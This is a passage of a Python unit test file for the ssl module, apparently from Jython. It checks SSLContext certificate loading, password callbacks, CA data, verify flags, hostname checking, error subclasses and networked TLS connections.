self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
if support.get_java_version() < (9,):
# FIXME: Fails on Java 9+. See b.j.o. issue #2710. A similar issue is seen in
# test_errors. CERTFILE as generated uses RSA 1024, which is considered too weak.
# This may be why this raises an error on Java 9:
# java.security.KeyStoreException: Key protection algorithm not found:
# java.security.KeyStoreException: Certificate chain is not valid
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(IOError) as cm:
ctx.load_cert_chain(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegexp(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegexp(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegexp(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegexp(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegexp(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegexp(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
ctx.load_verify_locations(cafile=BYTES_CERTFILE.decode('utf-8'))
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(IOError) as cm:
ctx.load_verify_locations(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(IOError):
ctx.load_verify_locations(u'')
with self.assertRaisesRegexp(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read().decode("ascii")
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read().decode("ascii")
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegexp(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata=u"broken")
with self.assertRaisesRegexp(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
@unittest.skipIf(support.is_jython, "Not yet supported on Jython")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(IOError) as cm:
ctx.load_dh_params(WRONGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
# Jython x509 will grow by 1 while openssl remains 0
# TODO investgate deeper
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 2})
ctx.load_verify_locations(REMOTE_ROOT_CERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'version': 3,
'serialNumber': 0L,
'subject': ((('emailAddress', 'support@cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('organizationName', 'Root CA'),)),
'notBefore': 'Mar 30 12:29:49 2003 GMT',
'issuer': ((('emailAddress', 'support@cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('organizationName', 'Root CA'),)),
'notAfter': 'Mar 29 12:29:49 2033 GMT'}])
# FIXME not currently collecting this aspect of the certificate
# 'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
#
# see this sample code on how we might be able to decode:
# https://svn.apache.org/repos/asf/cxf/tags/cxf-2.4.4/distribution/src/main/release/samples/sts_issue_operation/src/main/java/demo/sts/provider/cert/CRLVerifier.java
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 4, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
# self.assertEqual(
# ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
# getattr(ssl, "OP_NO_COMPRESSION", 0),
# )
with open(SIGNING_CA) as f:
cadata = f.read().decode("ascii")
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
# self.assertEqual(
# ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
# getattr(ssl, "OP_NO_COMPRESSION", 0),
# )
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
# self.assertEqual(
# ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
# getattr(ssl, "OP_NO_COMPRESSION", 0),
# )
# self.assertEqual(
# ctx.options & getattr(ssl, "OP_SINGLE_DH_USE", 0),
# getattr(ssl, "OP_SINGLE_DH_USE", 0),
# )
# self.assertEqual(
# ctx.options & getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
# getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
# )
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertFalse(ctx.check_hostname)
# Requires CERT_REQUIRED or CERT_OPTIONAL
with self.assertRaises(ValueError):
ctx.check_hostname = True
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertIn("foo", str(e))
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertIn("foo", str(e))
self.assertEqual(e.errno, 1)
@unittest.skipIf(support.is_jython, "TODO")
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
@unittest.skipIf(support.is_jython, "TODO")
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with closing(socket.socket()) as s:
s.bind(("127.0.0.1", 0))
s.listen(5)
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with closing(ctx.wrap_socket(c, False, do_handshake_on_connect=False)) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
class NetworkedTests(unittest.TestCase):
def test_connect(self):
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE)
try:
s.connect((REMOTE_HOST, 443))
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# this should fail because we have no verification certs
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.assertRaisesRegexp(ssl.SSLError, "certificate verify failed",
s.connect, (REMOTE_HOST, 443))
s.close()
# this should succeed because we specify the root cert
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
s.connect((REMOTE_HOST, 443))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
self.assertEqual(errno.EISCONN, s.connect_ex((REMOTE_HOST, 443)))
self.assertTrue(s.getpeercert())
finally:
s.close()
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.setblocking(False)
rc = s.connect_ex((REMOTE_HOST, 443))
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
# Jython added EALREADY, as in Jython connect may have already happened
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EALREADY, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
#self.assertTrue(s.getpeercert())
finally:
s.close()
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT,
do_handshake_on_connect=False)
try:
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == errno.EISCONN:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.ETIMEDOUT, errno.EAGAIN, errno.EWOULDBLOCK))
finally:
s.close()
def test_connect_ex_error(self):
with support.transient_internet(REMOTE_HOST):
s = ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=REMOTE_ROOT_CERT)
try:
rc = s.connect_ex((REMOTE_HOST, 444))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
finally:
s.close()
def test_connect_with_context(self):
with support.transient_internet(REMOTE_HOST):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
self.assertEqual({}, s.getpeercert())
finally:
s.close()
# Same with a server hostname
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=REMOTE_HOST)
s.connect((REMOTE_HOST, 443))
s.close()
# This should fail because we have no verification certs
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.assertRaisesRegexp(ssl.SSLError, "certificate verify failed",
s.connect, (REMOTE_HOST, 443))
s.close()
# This should succeed because we specify the root cert
ctx.load_verify_locations(REMOTE_ROOT_CERT)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
s.connect((REMOTE_HOST, 443))
try:
cert = s.getpeercert()
self.assertTrue(cert)
finally:
s.close()
def test_connect_cadata(self):
with open(REMOTE_ROOT_CERT) as f:
pem = f.read().decode('ascii')
der = ssl.PEM_cert_to_DER_cert(pem)
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with closing(ctx.wrap_socket(socket.socket(socket.AF_INET))) as s:
s.connect((REMOTE_HOST, 443))
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with closing(ctx.wrap_socket(socket.socket(socket.AF_INET))) as s:
s.connect((REMOTE_HOST, 443))
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(support.is_jython, "Can't use a socket as a file under Jython")
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
with support.transient_internet(REMOTE_HOST):
ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
ss.connect((REMOTE_HOST, 443))
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
with support.transient_internet(REMOTE_HOST):
s = socket.socket(socket.AF_INET)
s.connect((REMOTE_HOST, 443))
s.setblocking(False)
s = ssl.wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
s.close()
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
def _test_get_server_certificate(host, port, cert=None):
with support.transient_internet(host):
pem = ssl.get_server_certificate((host, port))
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
try:
pem = ssl.get_server_certificate((host, port),
ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
self.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
pem = ssl.get_server_certificate((host, port),
ca_certs=cert)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
_test_get_server_certificate(REMOTE_HOST, 443, REMOTE_ROOT_CERT)
if support.IPV6_ENABLED:
_test_get_server_certificate('ipv6.google.com', 443)
@unittest.skipIf(support.is_jython, "Currently not supported")
def test_ciphers(self):
remote = (REMOTE_HOST, 443)
with support.transient_internet(remote[0]):
with closing(ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL")) as s:
s.connect(remote)
with closing(ssl.wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT")) as s:
s.connect(remote)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegexp(ssl.SSLError, "No cipher can be selected"):
with closing(socket.socket(socket.AF_INET)) as sock:
s = ssl.wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(remote)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
# sha256.tbs-internet.com needs SNI to use the correct certificate
if not ssl.HAS_SNI or support.is_jython: # sha256.tbs-internet.com is no longer alive
self.skipTest("SNI needed for this test")
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with support.transient_internet("sha256.tbs-internet.com"):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(sha256_cert)
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="sha256.tbs-internet.com")
try:
s.connect(remote)
if support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
@unittest.skipIf(support.is_jython, "On jython preloaded TODO")
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
with support.transient_internet(REMOTE_HOST):
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
